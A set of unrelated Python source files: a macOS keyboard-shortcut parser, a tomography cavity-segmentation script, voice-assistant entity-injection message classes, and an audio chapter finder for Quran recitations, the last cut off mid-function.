# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
"""
Classes to represent MacOS keys and shortcuts
"""
import collections
import re
class MacOSKey:
    """store the name of a key, input names, and render names for that key"""
    # pylint: disable=too-many-instance-attributes, too-few-public-methods
    def __init__(
        self,
        key,
        name,
        input_names=None,
        shifted_key=None,
        html_entity=None,
        clarified_name=None,
        ascii_key=None,
        modifier=False,
    ):
        """Store the key's display character, name, and input aliases.

        See the attribute docstrings below for what each field means.
        """
        # pylint: disable=too-many-arguments)
        self.key = key
        """The (usually) single character representation of the key. For modifiers and
        most other named keys, we use the unicode representation, i.e. ⌘ for command,
        → for Right Arrow, etc."""
        self.name = name
        """The name of this key spelled out, ie the ← key is Left Arrow. If
        the key is F, the name is F."""
        self.input_names = input_names
        """A list of names which a user can input to reference this key"""
        self.shifted_key = shifted_key
        """If the key has a different output when the shift key is pressed, put
        the shifted value here"""
        self.clarified_name = clarified_name
        """Some keys can benefit from a clarified name, like Period (.) instead of ."""
        self.html_entity = html_entity
        """If this key has an HTML entity, store it here"""
        self.modifier = modifier
        """True if this key is a modifier key, like Fn, Shift, etc."""
        self.ascii_key = ascii_key
        """If the key is a modifier, it also has an ASCII representation, like ~ for Option"""
class MacOS:
    """The keys and their properties for MacOS

    Includes methods to parse user input into shortcuts
    """

    # make a list of keys, if the key isn't in this list (like F or R), then
    # it's just a single character key with nothing special about it
    keys = [
        # order matters for the modifier keys, they need to be in the apple
        # recommended order for displaying modifier keys
        MacOSKey("Fn", "Fn", ["func", "function", "fn"], ascii_key="*", modifier=True),
        MacOSKey(
            "⌃",  # this is not a caret, it's another unicode character
            "Control",
            ["control", "cont", "ctrl", "ctl"],
            ascii_key="^",  # this one is a caret
            modifier=True,
        ),
        MacOSKey("⌥", "Option", ["option", "opt", "alt"], ascii_key="~", modifier=True),
        MacOSKey("⇧", "Shift", ["shift", "shft"], ascii_key="$", modifier=True),
        MacOSKey(
            "⌘", "Command", ["command", "cmd", "clover"], ascii_key="@", modifier=True
        ),
        MacOSKey("⎋", "Escape", ["escape", "esc"]),
        MacOSKey("⇥", "Tab", ["tab"]),
        MacOSKey("⇪", "Caps Lock", ["capslock", "caps"]),
        MacOSKey("␣", "Space", ["space"]),
        MacOSKey("⏏", "Eject", ["eject"]),
        MacOSKey("⌫", "Delete", ["delete", "del"]),
        MacOSKey(
            "⌦",
            "Forward Delete",
            ["forwarddelete", "fwddelete", "forwarddel", "fwddel"],
        ),
        MacOSKey("⌧", "Clear", ["clear"], clarified_name="Clear (⌧)"),
        MacOSKey("↩", "Return", ["return", "rtn"]),
        MacOSKey("⌅", "Enter", ["enter", "ent"]),
        MacOSKey("⇞", "Page Up", ["pageup", "pgup"]),
        MacOSKey("⇟", "Page Down", ["pagedown", "pgdown"]),
        MacOSKey("↖", "Home", ["home"]),
        MacOSKey("↘", "End", ["end"]),
        MacOSKey("←", "Left Arrow", ["leftarrow", "left"]),
        MacOSKey("→", "Right Arrow", ["rightarrow", "right"]),
        MacOSKey("↑", "Up Arrow", ["uparrow", "up"]),
        MacOSKey("↓", "Down Arrow", ["downarrow", "down"]),
        MacOSKey("leftclick", "click", ["leftclick", "click"]),
        MacOSKey("rightclick", "right click", ["rightclick", "rclick"]),
        MacOSKey(
            "`",
            "`",
            ["grave", "backtick", "backquote"],
            shifted_key="~",
            clarified_name="Grave (`)",
        ),
        MacOSKey("~", "~", ["tilde"], clarified_name="Tilde (~)"),
        MacOSKey("1", "1", shifted_key="!"),
        MacOSKey("2", "2", shifted_key="@"),
        MacOSKey("3", "3", shifted_key="#"),
        MacOSKey("4", "4", shifted_key="$"),
        MacOSKey("5", "5", shifted_key="%"),
        MacOSKey("6", "6", shifted_key="^"),
        MacOSKey("7", "7", shifted_key="&"),
        MacOSKey("8", "8", shifted_key="*"),
        MacOSKey("9", "9", shifted_key="("),
        MacOSKey("0", "0", shifted_key=")"),
        MacOSKey("-", "-", ["minus"], shifted_key="_", clarified_name="Minus Sign (-)"),
        MacOSKey("_", "_", ["underscore"], clarified_name="Underscore (_)"),
        MacOSKey("=", "=", ["equals", "equal"], shifted_key="+"),
        MacOSKey("+", "+", ["plus"], clarified_name="Plus Sign (+)"),
        MacOSKey("[", "[", shifted_key="{"),
        MacOSKey("]", "]", shifted_key="}"),
        MacOSKey("\\", "\\", ["backslash"], shifted_key="|"),
        MacOSKey("|", "|", ["pipe"]),
        MacOSKey(
            ";",
            ";",
            ["semicolon", "semi"],
            shifted_key=":",
            clarified_name="Semicolon (;)",
        ),
        MacOSKey(
            "'",
            "'",
            ["singlequote", "sq"],
            shifted_key='"',
            clarified_name="Single Quote (')",
        ),
        MacOSKey('"', '"', ["doublequote", "dq"], clarified_name='Double Quote (")'),
        MacOSKey(",", ",", ["comma"], shifted_key="<", clarified_name="Comma (,)"),
        MacOSKey(".", ".", ["period"], shifted_key=">", clarified_name="Period (.)"),
        # BUGFIX: the clarified name previously read "Slash (.)"
        MacOSKey("/", "/", ["slash"], shifted_key="?", clarified_name="Slash (/)"),
        MacOSKey("?", "?", ["questionmark", "question"]),
    ]
    # programmatically create 35 function keys
    # we choose 35 because that's how many are defined in NSEvent()
    # see https://developer.apple.com/documentation/appkit/1535851-function-key_unicodes
    for _num in range(1, 36):
        _fkey = "F{}".format(_num)
        keys.append(MacOSKey(_fkey, _fkey, [_fkey.lower()]))
    # modifiers is a subset of keys
    modifiers = []
    for _key in keys:
        if _key.modifier:
            modifiers.append(_key)
    # build a keyname dictionary lookup
    keyname_map = {}
    for _key in keys:
        if _key.input_names:
            for _name in _key.input_names:
                keyname_map[_name] = _key
    #
    # construct various data structures from keys, which are the authoritative
    # source
    # the hyper key is weird because it's a combination of other keys, so we
    # have to handle it separately
    hyper_mods = []
    hyper_mods.append(keyname_map["control"])
    hyper_mods.append(keyname_map["option"])
    hyper_mods.append(keyname_map["shift"])
    hyper_mods.append(keyname_map["command"])
    hyper_name = "Hyper"
    hyper_regex = r"\b" + hyper_name.lower() + r"\b"
    # can't refactor mods_ascii and mods_unicode into a single
    # dictionary, see parse_shortcut() for why
    mods_ascii = collections.OrderedDict()
    mods_unicode = collections.OrderedDict()
    unshifted_keys = ""
    shifted_keys = ""
    mods_regexes = []
    for _key in keys:
        if _key.modifier:
            mods_ascii[_key.ascii_key] = _key
            mods_unicode[_key.key] = _key
            _regex = r"\b(" + "|".join(_key.input_names) + r")\b"
            mods_regexes.append((_key, _regex))
        if _key.shifted_key:
            unshifted_keys += _key.key
            shifted_keys += _key.shifted_key
    # make some translation tables
    to_shifted_trans = str.maketrans(unshifted_keys, shifted_keys)
    to_unshifted_trans = str.maketrans(shifted_keys, unshifted_keys)

    @classmethod
    def named_keys(cls, *, hyper=False, **_):
        """Return a string containing a formatted list of all known keys

        Designed to be called with the namespace from argparse:

            ksc.MacOS.named_keys(**vars(args)))

        If not using argparse, you can just pass the keyword only
        arguments as you typically would
        """
        # start with the modifiers
        output = []
        fmt = "{:12} {:18} {}"
        output.append(fmt.format("Key", "Name", "Inputs"))
        output.append(fmt.format("-" * 12, "-" * 18, "-" * 50))
        keyflag = True
        for key in cls.keys:
            if key.modifier is False and keyflag is True:
                if hyper:
                    output.append(
                        fmt.format(" ", cls.hyper_name, cls.hyper_name.lower())
                    )
                keyflag = False
            if key.key != key.name or key.clarified_name or key.input_names:
                output.append(
                    fmt.format(
                        key.key,
                        key.clarified_name or key.name,
                        ",".join(key.input_names if key.input_names else ""),
                    )
                )
        return "\n".join(output)

    @classmethod
    def parse_shortcuts(cls, text):
        """parse a string or array of text into a standard representation of the shortcut

        text = a string of text to be parsed

        returns an array of shortcut combinations
        """
        combos = []
        for combo in re.split(r" [/|] ", text):
            combos.append(cls.parse_shortcut(combo))
        return combos

    @classmethod
    def parse_shortcut(cls, text):
        """parse a string and return a MacOSKeyboardShortcut object

        Raises ValueError if string can't be parsed
        """
        # pylint: disable=too-many-branches
        # save the original text for an error message
        orig_text = text
        mods = []
        key = ""
        # Only remove hyphens preceded and followed by non-space character
        # to avoid removing the last hyphen from 'option-shift--' or 'command -'
        text = re.sub(r"(?<=\S)-(?=\S)", " ", text)
        # remove words that represent modifiers from the text, and add them
        # to the 'mods' array
        for (mod, regex) in cls.mods_regexes:
            # BUGFIX: the 4th positional argument of re.subn is ``count``,
            # not ``flags`` -- passing re.IGNORECASE positionally capped the
            # substitutions at 2 and left matching case-sensitive. It must
            # be passed as the ``flags`` keyword.
            (text, howmany) = re.subn(regex, "", text, flags=re.IGNORECASE)
            if howmany:
                mods.append(mod)
        # look for the hyper key
        (text, howmany) = re.subn(cls.hyper_regex, "", text, flags=re.IGNORECASE)
        if howmany:
            for mod in cls.hyper_mods:
                mods.append(mod)
        # process the remainder of the text
        for char in text.strip():
            if char == " ":
                continue
            if char in cls.mods_unicode:
                # translate unicode modifier symbols to their plaintext equivalents
                mods.append(cls.mods_unicode[char])
            elif char in cls.mods_ascii and cls.mods_ascii[char] not in mods:
                # but since plaintext modifiers could also be a key, aka
                # @$@ really means command-shift-2, we only treat the first
                # occurrence of a plaintext modifier as a modifier, subsequent
                # occurrences are the key
                mods.append(cls.mods_ascii[char])
            else:
                key += char
        # map key names to key symbols
        if key.lower() in cls.keyname_map:
            # special key names, pgup, etc are in lowercase
            key = cls.keyname_map[key.lower()].key
        if len(key) == 1:
            if key in cls.shifted_keys:
                # command % should be command shift 5
                # and command ? should be command shift ?
                # these ↓ are the shifted number keys
                mods.append(cls.keyname_map["shift"])  # dups will get removed later
                # the unwritten apple rule that shifted numbers are
                # written as numbers not their symbols
                if key in "!@#$%^&*()":
                    key = key.translate(cls.to_unshifted_trans)
            else:
                if cls.keyname_map["shift"] in mods:
                    # shift is in the mods, and the key is unshifted
                    # we should have the shifted symbol unless it is
                    # a number or letter
                    # command shift 5 should remain command shift 5
                    # and command shift r should remain command shift r
                    if key not in "0123456789":
                        # but shift command / should be shift command ?
                        key = key.translate(cls.to_shifted_trans)
            # shortcuts always displayed with upper case letters
            key = key.upper()
        else:
            if key.lower() in cls.keyname_map:
                # these are the function keys because they are in the map
                # and the key name is longer than a single character
                # either way, if the key is in the map then it's valid
                pass
            else:
                raise ValueError("error parsing '{}'".format(orig_text))
        # remove duplicate modifiers
        mods = list(set(mods))
        # sort the mods to be in Apple's recommended order
        mods.sort(key=cls.keys.index)
        return MacOSKeyboardShortcut(mods, key)
class MacOSKeyboardShortcut:
    """Store and render a keyboard shortcut in the macos flavor

    When this object is created, it expects the modifiers, if present, are in the
    correct order as specified by the Apple Style Guidelines. This occurs in
    MacOS.parse_shortcut().
    """

    def __init__(self, mods, key):
        """
        mods is a list of MacOSKey objects which are modifiers
        key is the keyname (i.e L, ←, 5 or F12)
        """
        self.mods = mods
        self.key = key

    def __repr__(self):
        """custom repr"""
        return "MacOSKeyboardShortcut('{}')".format(self.render())

    def __str__(self):
        """custom string representation"""
        return self.render()

    def render(
        self,
        *,
        hyper=False,
        modifier_symbols=False,
        modifier_ascii=False,
        plus_sign=False,
        key_symbols=False,
        clarify_keys=False,
        **_
    ):
        """render this key as a string for human consumption

        Designed to be called with the namespace from argparse:

            combo.render(**vars(args))

        If not using argparse, you can just pass the keyword only
        arguments as you typically would
        """
        tokens = []
        joiner = ""
        if modifier_symbols:
            if plus_sign:
                joiner = "+"
            tokens.extend(self.mod_symbols())
        elif modifier_ascii:
            joiner = ""
            tokens.extend(self.mod_ascii())
        else:
            joiner = "-"
            tokens.extend(self.mod_names(hyper=hyper))
        if key_symbols:
            # BUGFIX: this used to be ``tokens.extend(self.key)``, which
            # iterates the string and splits a multi-character key like
            # "F12" into "F", "1", "2" (rendered "F+1+2" with a joiner).
            tokens.append(self.key)
        else:
            tokens.append(self.key_name(clarify_keys=clarify_keys))
        return joiner.join(tokens)

    def mod_names(self, hyper=False):
        """return a list of modifier names for this shortcut"""
        output = []
        if hyper and self.mods == MacOS.hyper_mods:
            output.append(MacOS.hyper_name)
        else:
            for mod in self.mods:
                output.append(mod.name)
        return output

    def mod_symbols(self):
        """return a list of unicode symbols representing the modifier names"""
        output = []
        for mod in self.mods:
            output.append(mod.key)
        return output

    def mod_ascii(self):
        """return a list of ascii symbols representing the modifier names"""
        output = []
        for mod in self.mods:
            output.append(mod.ascii_key)
        return output

    def key_name(self, *, clarify_keys=False):
        """return either the key, or if it has a name return that"""
        # find the key object, if it exists
        keyobj = None
        for keytest in MacOS.keys:
            if self.key == keytest.key:
                keyobj = keytest
                break
        # if we have a key object, then use its name and clarified name
        if keyobj:
            if clarify_keys and keyobj.clarified_name:
                return keyobj.clarified_name
            return keyobj.name
        # otherwise
        return self.key
|
import os
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt, cm
from pymicro.file.file_utils import HST_read, HST_write, HST_info

# Segment cavities in a tomographic scan of steel: binarize, label, remove
# ring artifacts, mark everything outside the specimen, and save diagnostic
# images along the way. All ``print`` statements are now print() calls so the
# script runs under Python 2 and 3 with identical output.
data_dir = '../../examples/data'
scan_name = 'steel_431x431x246_uint8'
scan_path = os.path.join(data_dir, scan_name + '.raw')
print('reading volume...')
data = HST_read(scan_path, header_size=0)
plt.figure(1, figsize=(10, 5))
plt.subplot(121)
plt.imshow(data[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
print('rotating volume...')
data = ndimage.rotate(data, 15.5, axes=(1, 0), reshape=False)
plt.subplot(122)
plt.imshow(data[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
plt.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.1)
plt.savefig(scan_name + '_data.png')
print('binarizing volume...')
# voxels with intensity <= 100 become 255 (cavities), the rest 0
data_bin = np.where(np.greater(data, 100), 0, 255).astype(np.uint8)
print('labeling cavities...')
label_im, nb_labels = ndimage.label(data_bin)
plt.figure(2, figsize=(10, 5))
plt.subplot(121)
plt.imshow(data_bin[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
plt.subplot(122)
plt.imshow(label_im[:, :, 87].transpose(), interpolation='nearest', cmap=cm.jet)
plt.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.1)
plt.savefig(scan_name + '_label.png')
print('nb of labels: %s' % nb_labels)
sizes = ndimage.sum(data_bin / 255, label_im, range(1, nb_labels + 1))
# simple ring removal artifact: a ring's center of mass falls in its hole, so
# the voxel at the center of mass does not carry the ring's own label
coms = ndimage.measurements.center_of_mass(data_bin / 255, labels=label_im,
                                           index=range(1, nb_labels + 1))
rings = 0
for i in range(nb_labels):
    # int(round(...)) -- round() returns a float under Python 2 and float
    # indices are rejected by modern numpy
    com_x = int(round(coms[i][0]))
    com_y = int(round(coms[i][1]))
    com_z = int(round(coms[i][2]))
    if not label_im[com_x, com_y, com_z] == i + 1:
        print('likely found a ring artifact at (%d, %d, %d) for label = %d, value is %d'
              % (com_x, com_y, com_z, (i + 1), label_im[com_x, com_y, com_z]))
        data_bin[label_im == (i + 1)] = 0
        rings += 1
print('removed %d rings artifacts' % rings)
print('labeling and using a fixed color around the specimen')
# the outside is by far the largest label here
mask_outside = (sizes >= ndimage.maximum(sizes))
print('inverting the image so that outside is now 1')
data_inv = 1 - label_im
# NOTE(review): indexing ``mask_outside`` with the inverted label array relies
# on those values being valid indices -- TODO confirm this is intentional
outside = mask_outside[data_inv]
outside = ndimage.binary_closing(outside, iterations=3)
# force a 3-voxel border so the specimen never touches the image edge
outside[0:3, :, :] = 1
outside[-3:, :, :] = 1
outside[:, 0:3, :] = 1
outside[:, -3:, :] = 1
outside[:, :, 0:3] = 1
outside[:, :, -3:] = 1
data_bin[outside] = 155
plt.figure(3, figsize=(10, 5))
plt.subplot(121)
plt.imshow(data_inv[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
plt.clim(0, 1)
plt.subplot(122)
plt.imshow(data_bin[:, :, 87].transpose(), interpolation='nearest', cmap=cm.gray)
plt.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.1)
plt.savefig(scan_name + '_outside.png')
print('saving data...')
HST_write(data_bin, scan_name + '_bin.raw')
|
<reponame>fraserloch/hermes-protocol<filename>platforms/hermes-python/hermes_python/ontology/injection/__init__.py
from typing import Optional, Text, List, Mapping
from ...ffi.ontology.injection import InjectionKind, CInjectionRequestMessage, CInjectionResetCompleteMessage, CInjectionResetRequestMessage, CInjectionCompleteMessage
class InjectionStatusMessage(object):
    """Message carrying the date of the most recent entity injection."""

    def __init__(self, last_injection_date):
        # date string of the last injection, as reported by the platform
        self.last_injection_date = last_injection_date

    @classmethod
    def from_c_repr(cls, c_repr):
        """Build an instance from its C representation (bytes -> unicode)."""
        decoded_date = c_repr.last_injection_date.decode('utf-8')
        return cls(decoded_date)
class InjectionRequestMessage(object):
    def __init__(self, operations, lexicon=None, cross_language=None, id=None):
        # type: (List[InjectionRequestOperation], Optional[Mapping[Text, List[Text]]], Optional[Text], Optional[Text]) -> None
        """
        :param operations: List of operations to execute in the order of the list on a model
        :type operations: List[InjectionRequestOperation]
        :param lexicon: List of pre-computed pronunciations to add in a model
        :type lexicon: Mapping[Text, List[Text]]
        :param cross_language: Language for cross-language G2P
        :type cross_language: Optional[Text]
        :param id: The id of the `InjectionRequestMessage` that was processed
        :type id: Optional[Text]
        """
        self.operations = operations
        # BUGFIX: the default used to be ``lexicon=dict()``, a single dict
        # created at definition time and shared by every instance; mutations
        # leaked across messages. The None sentinel gives each instance its
        # own empty dict while keeping the call signature compatible.
        self.lexicon = lexicon if lexicon is not None else {}
        self.cross_language = cross_language
        self.id = id

    def __eq__(self, other):
        return self.__dict__ == other.__dict__

    @classmethod
    def from_c_repr(cls, c_repr):
        """Build the message from its C representation."""
        number_of_operations = c_repr.operations.contents.count
        c_operations_array_repr = c_repr.operations.contents.operations
        operations = [InjectionRequestOperation.from_c_repr(c_operations_array_repr[i].contents) for i in
                      range(number_of_operations)]
        lexicon = c_repr.lexicon.contents.into_repr()
        # BUGFIX: this previously decoded ``c_repr.id`` (copy/paste error),
        # returning the request id instead of the cross-language value.
        cross_language = c_repr.cross_language.decode('utf-8') if c_repr.cross_language else None
        id = c_repr.id.decode('utf-8') if c_repr.id else None
        return cls(operations, lexicon, cross_language, id)

    def into_c_repr(self):
        """Convert back into the ctypes structure used by the FFI layer."""
        return CInjectionRequestMessage.from_repr(self)
class InjectionRequestOperation(object):
    """Base class for a single injection operation (see Add* subclasses)."""

    def __init__(self, values):
        # values: mapping of entity name -> list of values to inject.
        self.values = values

    def __eq__(self, other):
        return self.__dict__ == other.__dict__

    @classmethod
    def from_c_repr(cls, c_repr):
        """Dispatch to the concrete operation subclass based on the C kind tag."""
        kind = InjectionKind(c_repr.kind)
        if kind == InjectionKind.ADD_FROM_VANILLA:
            return AddFromVanillaInjectionRequest.from_c_repr(c_repr)
        elif kind == InjectionKind.ADD:
            return AddInjectionRequest.from_c_repr(c_repr)
        else:
            # Bug fix: `raise ("Unknown injection kind")` raised a TypeError
            # ("exceptions must derive from BaseException") instead of the
            # intended error message.
            raise ValueError("Unknown injection kind: {}".format(kind))
class AddInjectionRequest(InjectionRequestOperation):
    """Operation that adds `values` on top of the entity values already present."""

    def __init__(self, values):
        # type:(Mapping[Text, List[Text]]) -> None
        """
        :param values: Mapping of entity name to the list of values to add.
        """
        self.kind = InjectionKind.ADD
        self.values = values

    @classmethod
    def from_c_repr(cls, c_repr):
        """Build an instance from the C representation of the operation."""
        decoded_values = c_repr.values.contents.into_repr()
        return cls(decoded_values)
class AddFromVanillaInjectionRequest(InjectionRequestOperation):
    """Operation that replaces entity values, starting over from the vanilla model."""

    def __init__(self, values):
        """
        :param values: Mapping of entity name to the list of values to inject.
        """
        self.kind = InjectionKind.ADD_FROM_VANILLA
        self.values = values

    @classmethod
    def from_c_repr(cls, c_repr):
        """Build an instance from the C representation of the operation."""
        decoded_values = c_repr.values.contents.into_repr()
        return cls(decoded_values)
class InjectionCompleteMessage(object):
    """Notification that an injection request has finished."""

    def __init__(self, request_id):
        # type: (Text) -> None
        """
        :param request_id: The id of the injection request that just completed.
        :type request_id: Text
        """
        self.request_id = request_id

    def __eq__(self, other):
        return self.__dict__ == other.__dict__

    @classmethod
    def from_c_repr(cls, c_repr):
        """Build an instance from the C representation, decoding the raw id."""
        decoded_id = c_repr.request_id.decode('utf-8')
        return cls(decoded_id)

    def into_c_repr(self):
        """Convert back into the C representation."""
        return CInjectionCompleteMessage.from_repr(self)
class InjectionResetRequestMessage(object):
    """Request to reset previously injected values."""

    def __init__(self, request_id):
        # type: (Text) -> None
        """
        :param request_id: The id of the injection reset request.
        :type request_id: Text
        """
        self.request_id = request_id

    def __eq__(self, other):
        return self.__dict__ == other.__dict__

    @classmethod
    def from_c_repr(cls, c_repr):
        """Build an instance from the C representation, decoding the raw id."""
        decoded_id = c_repr.request_id.decode('utf-8')
        return cls(decoded_id)

    def into_c_repr(self):
        """Convert back into the C representation."""
        return CInjectionResetRequestMessage.from_repr(self)
class InjectionResetCompleteMessage(object):
    """Notification that an injection reset request has finished."""

    def __init__(self, request_id):
        # type: (Text) -> None
        """
        :param request_id: The id of the injection reset request that just completed.
        :type request_id: Text
        """
        self.request_id = request_id

    def __eq__(self, other):
        return self.__dict__ == other.__dict__

    @classmethod
    def from_c_repr(cls, c_repr):
        """Build an instance from the C representation, decoding the raw id."""
        decoded_id = c_repr.request_id.decode('utf-8')
        return cls(decoded_id)

    def into_c_repr(self):
        """Convert back into the C representation."""
        return CInjectionResetCompleteMessage.from_repr(self)
|
<gh_stars>0
from core.search_engine import SearchEngine
from core.asr import ASR
class Finder:
    '''
    Take a segment and find if a chapter beginning is in it
    try to get the location of the beginning
    '''

    def __init__(self):
        # Finder declares no explicit base class; super().__init__() is a no-op here.
        super().__init__()
        self.EXAMINE_DURATION = 30  # seconds
        self.SAME_TIME_THRESHOLD = 7  # seconds. if abs(t - start) < SAME_TIME_THRESHOLD, we will consider t as start
        # External speech recognizer and full-text search over the text corpus.
        self.asr = ASR()
        self.searchEngine = SearchEngine()
        self.searchEngine.loadOrBuild(indexDir="./core/search_engine/index_allstored")
        # One entry per chapter: the page (as a string) where the chapter begins.
        self.chaptersBeginnings = self.readChaptersBeginnings()
        self.chaptersInfo = self.readChaptersInfos()

    def find(self, filePath, start, end):
        '''
        filepath: original file that have the pray including the recitation
        start: start of the recitation rak3a
        end: end of the recitation rak3a
        segment = audio(filepath)[start:end]
        this function examines first 30 seconds of the segment, and last 30 seconds of the segment
        '''
        totalDuration = end - start
        duration = min(totalDuration, self.EXAMINE_DURATION)

        def continuousFind(xstart, shift):  # validate the result till find applicable one
            # Transcribe successive `duration`-second windows starting at xstart,
            # shifting by `shift` seconds, until the search engine returns a hit
            # with page_score > 20 or the attempt budget is exhausted.
            maxTests = 15
            while(True):
                approximatedText = self.asr.recognizeGoogle(filePath, xstart, duration)
                print("approximatedText:", approximatedText)
                if(len(approximatedText) < 45):
                    # Too little text to search reliably; move to the next window.
                    xstart += shift
                    print(f"approximated text is very short.. we will try next block. try next block @ {xstart}")
                    continue
                results, locations = self.searchEngine.search(approximatedText, limit=1)
                bestAya = locations[0]
                if(bestAya['page_score'] > 20): return bestAya, True
                xstart += shift
                print(bestAya)
                print(f"very low page score={bestAya['page_score']} < 20. try next block @ {xstart}")
                maxTests -= 1
                if(maxTests == 0):
                    print("max tests of 15 reached. break now")
                    return None, False
        # first aya in the segment
        bestAyaStart, succ = continuousFind(start, duration)
        if(not succ):
            return None
        # last aya in the segment
        bestAyaEnd, succ = continuousFind(end - duration, -duration)
        if(not succ):
            return None
        print(bestAyaStart)
        print(bestAyaEnd)
        page1, page2 = bestAyaStart['page'], bestAyaEnd['page']
        sura1, sura2 = bestAyaStart['sura'], bestAyaEnd['sura']
        totalPages = page2 - page1 + 1
        approxPageDuration = totalDuration / totalPages  # 134 seconds per page
        if(page2 < page1 or sura2 < sura1):
            print("pageEnd < pageStart. segment expected wrongly")
            return None
        # find chapters
        chapters = self.chaptersInRange(page1, page2)
        # Pre-size with empty dicts; skipped chapters leave {} which is removed below.
        chaptersResult = [{} for _ in range(len(chapters))]
        chapterOnBeginning = False  # flag to check pre-part of first chapter in the segment
        for cri, chapterInfo in enumerate(chapters):
            chapterIndex, chapterPageBegin = chapterInfo
            if not (chapterIndex >= sura1 and chapterIndex <= sura2):  # to ignore case of begin of chapter is not in the begin of page. and reciter has not start in the new chapter
                continue
            # try finding the location in the segment that chapter begin
            print(f"try finding the page where chapter #{chapterIndex} begin (page #{chapterPageBegin})")
            # expect: linear interpolation from page offset to a time offset.
            expected = start + approxPageDuration * (chapterPageBegin - page1)
            expected = min(expected, end - self.EXAMINE_DURATION)  # always be in segment
            bestAya, newExpected, succ = self.findPageSecond(filePath, expected, duration, start, end, chapterPageBegin)
            increasing = newExpected > expected
            expected = newExpected
            print(f"chapter {chapterIndex} is around {expected} seconds")
            if(succ):
                # try finding first aya location on the page if we succeeded in finding wanted page
                bestAya, expected = self.findOnPage(filePath, duration, bestAya, expected, increasing, chapterIndex)
                print(f"chapter {chapterIndex} is most probably at {expected} seconds")
            if(abs(start - expected) < self.SAME_TIME_THRESHOLD):
                print(f"adjust {expected} to the beginning of the segment({start}) as it is more reasonable")
                expected = start
                chapterOnBeginning = True
                bestAya = bestAyaStart
            chaptersResult[cri]["expected_start"] = expected
            chaptersResult[cri]["is_accurate"] = succ
            chaptersResult[cri]["is_first_part"] = True
            chaptersResult[cri]["is_last_part"] = False
            chaptersResult[cri]["best_aya"] = bestAya
            if(cri > 0):
                # The previous chapter's part ends where this chapter starts.
                chaptersResult[cri - 1]["expected_end"] = expected
                # NOTE(review): this flips is_last_part on the *current* entry;
                # confirm it was not meant to be chaptersResult[cri - 1].
                chaptersResult[cri]["is_last_part"] = True
        # Drop placeholder entries for chapters skipped above.
        while {} in chaptersResult:
            chaptersResult.remove({})
        if(len(chaptersResult) > 0):
            if(not chapterOnBeginning):
                # The segment starts mid-chapter: synthesize an entry for the
                # part preceding the first detected chapter beginning.
                expectedEnd = chaptersResult[0]['expected_start']
                acc = chaptersResult[0]['is_accurate']
                chaptersResult.insert(0, {
                    "expected_start": start,
                    "expected_end": expectedEnd,
                    "is_accurate": acc,
                    "is_first_part": False,
                    "is_last_part": True,  # because we know that after it there is a chapter
                    "best_aya": bestAyaStart
                })
            chaptersResult[-1]["expected_end"] = end
        else:
            # No chapter beginning found in the segment: the whole segment is
            # one mid-chapter part.
            chaptersResult.append({
                "expected_start": start,
                "expected_end": end,
                "is_accurate": True,
                "is_first_part": False,
                "is_last_part": False,  # maybe the last part
                "best_aya": bestAyaStart
            })
        return chaptersResult

    def chaptersInRange(self, startPage, endPage):
        """Return [chapterNumber, beginPage] for chapters beginning in [startPage, endPage]."""
        res = []
        for chapterIndex, chapterBegin in enumerate(self.chaptersBeginnings):
            # chapterIndex is zero based
            chapterBegin = int(chapterBegin)
            if(chapterBegin >= startPage and chapterBegin <= endPage):
                res.append([chapterIndex + 1, chapterBegin])
            if(chapterBegin > endPage): break
        return res

    def readChaptersBeginnings(self):
        # One line per chapter: the page number where the chapter begins.
        with open("../assets/chapters_begin_page.txt") as f:
            return f.read().splitlines(False)

    def readChaptersInfos(self):
        # Per-chapter page info lines; format defined by the asset file.
        with open("../assets/chapters_page_info.txt") as f:
            return f.read().splitlines(False)

    def findPageSecond(self, filePath, expected, duration, mn, mx, targetPage):
        """Binary-ish scan around `expected` (clamped to [mn, mx]) for the second
        at which `targetPage` is being recited. Returns (location, second, success)."""
        expected = expected or mn
        increasing = None  # this value will be overridden in the first iteration
        maxTests = 15
        actualPage = targetPage - 1  # work around for None in first iteration issue
        while(expected <= mx and expected >= mn):  # get the wanted page
            maxTests -= 1
            approximatedText = self.asr.recognizeGoogle(filePath, expected, duration)
            if(approximatedText):
                results, locations = self.searchEngine.search(approximatedText, limit=1)  # TODO: narrow down the search documents here
                actualPage = locations[0]['page']  # TODO: if in first iteration text is None, this will cause error in the check "actualPage == targetPage"
            else:
                print("ASR returns None @find at", expected)
            print(f"actual page, wanted page = {actualPage}, {targetPage}")
            if(actualPage == targetPage):
                return locations[0], expected, True
            elif(actualPage > targetPage):
                expected -= self.EXAMINE_DURATION
                increasing = False
            elif(actualPage < targetPage):
                expected += self.EXAMINE_DURATION
                increasing = True
            if(maxTests == 0):
                print("max tests of 15 exceeded, we will break in current expected value")
                break
        # NOTE(review): if ASR never returned text, `locations` is unbound here
        # and this return raises NameError — confirm and guard upstream.
        return locations[0], expected, False

    def findOnPage(self, filePath, duration, bestAya, expected, increasing, chapterIndex):
        '''
        adjuts @param:expected value in page to more close to the first aya in the @param:chapterIndex
        '''
        # start with big shift and every time increasing changes, decrease the shift value
        currentAya = bestAya['index']
        currentSura = bestAya['sura']
        shift = self.EXAMINE_DURATION
        maxTests = 15
        print("sura, aya:", currentSura, currentAya, "and shift=", shift, "we are in", expected)
        # Loop until the recognized position lands inside the first few ayat of
        # the wanted chapter (bounds come from the chaptersMaxAya table).
        while(not (currentSura == chapterIndex and currentAya >= 1 and currentAya <= chaptersMaxAya[chapterIndex - 1])):
            maxTests -= 1
            if(maxTests < 0):
                print("max tests of 15 exceeded, we will break in current expected value")
                break
            if(currentSura < chapterIndex):  # previous sura
                expected += shift
                if(not increasing):  # toggling event
                    shift /= 1.5
                    shift = max(shift, 1)
                    increasing = True
            else:  # next sura or same sura but current aya is far away
                expected -= shift
                if(increasing):  # toggling event
                    shift /= 1.5
                    shift = max(shift, 1)
                    increasing = False
